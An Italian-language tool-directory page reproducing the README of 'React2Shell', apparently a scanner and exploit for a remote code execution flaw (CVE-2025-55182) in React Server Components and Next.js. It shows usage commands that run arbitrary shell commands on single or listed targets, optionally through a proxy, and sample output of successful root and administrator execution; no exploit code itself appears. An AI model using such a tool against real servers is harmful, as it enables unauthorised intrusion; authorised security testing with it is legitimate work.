Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
Strumenti/GitHubGitHub/ankitspandey07/react2shell
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

React2Hell — CVE-2025-55182 Exploit

🔥 Exploit per Esecuzione Remota di Codice (RCE) su Server Next.js / React

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Exploit RCE su Server Next.js/React — CVE-2025-55182
 Autore: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Utility di Test di Sicurezza  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Panoramica

React2Hell è un potente strumento di sfruttamento progettato per testare e sfruttare CVE-2025-55182, una vulnerabilità critica di Esecuzione Remota di Codice che colpisce Next.js e React Server Actions.

Una vulnerabilità di esecuzione remota di codice pre-autenticazione esiste in React Server Components versioni 19.0.0, 19.1.0, 19.1.1 e 19.2.0, inclusi i seguenti pacchetti: react-server-dom-parcel, react-server-dom-turbopack e react-server-dom-webpack. Il codice vulnerabile deserializza in modo non sicuro i payload dalle richieste HTTP agli endpoint delle funzioni server.


✨ Caratteristiche

  • 🧨 Esecuzione Remota di Codice (RCE)
  • 🌐 Scansione URL singoli / multipli
  • 🧩
Scarica lo strumento
Esecuzione di comandi personalizzati
  • 🕵️‍♂️ Modalità stealth con supporto proxy
  • ⚡ Veloce, affidabile e facile da usare

  • 📌 Utilizzo

    Modalità Singolo Target

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami"
    

    Target Multipli (da file)

    root@kitploit:~
    python Scanner.py -l urls.txt -c "whoami"
    

    Con Proxy HTTP (Burp Suite)

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
    

    Con Proxy HTTPS

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
    

    📁 Esempio di urls.txt

    root@kitploit:~
    http://site1.com
    https://site2.com
    http://192.168.1.10:3000
    

    🖥️ Output di Esempio

    root@kitploit:~
    PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
    
    
    █████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
    ██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
    ██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                    
    {MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
     Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
        🚀  React2Shell — Security Testing Utility  🚀
    
    ════════════════════════════════════════════════════════════════════════
    [+] Loaded 3 targets
    ════════════════════════════════════════════════════════════════════════
    
    [→] Target: http://evil.com:3113/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    root
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: http://example.lab:2000/
    [→] Exec:   whoami
    [✗] Not vulnerable — Status: 200
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: https://tale.lab:3000/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    win-1fl835ovldc\\administrator
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    [✓] Scan complete — Vulnerable: 2
    PS D:\Ankitspandey07\React2Hell>
    

    ⚠️ Dichiarazione di non responsabilità

    Questo strumento è creato strettamente per scopi educativi e di ricerca sulla sicurezza. NON utilizzarlo su sistemi senza autorizzazione esplicita. Sei responsabile delle tue azioni.


    ⭐ Supporta il Progetto

    Se questo exploit ti è stato utile, considera di lasciare una ⭐ su GitHub ❤️


    👤 Autore

    Ankit Pandey; GitHub: https://github.com/Ankitspandey07

    Realizzato con 🔥 da qualcuno che è un Penetration Tester orgoglioso e appassionato, che prospera nell'imparare ad ogni passo.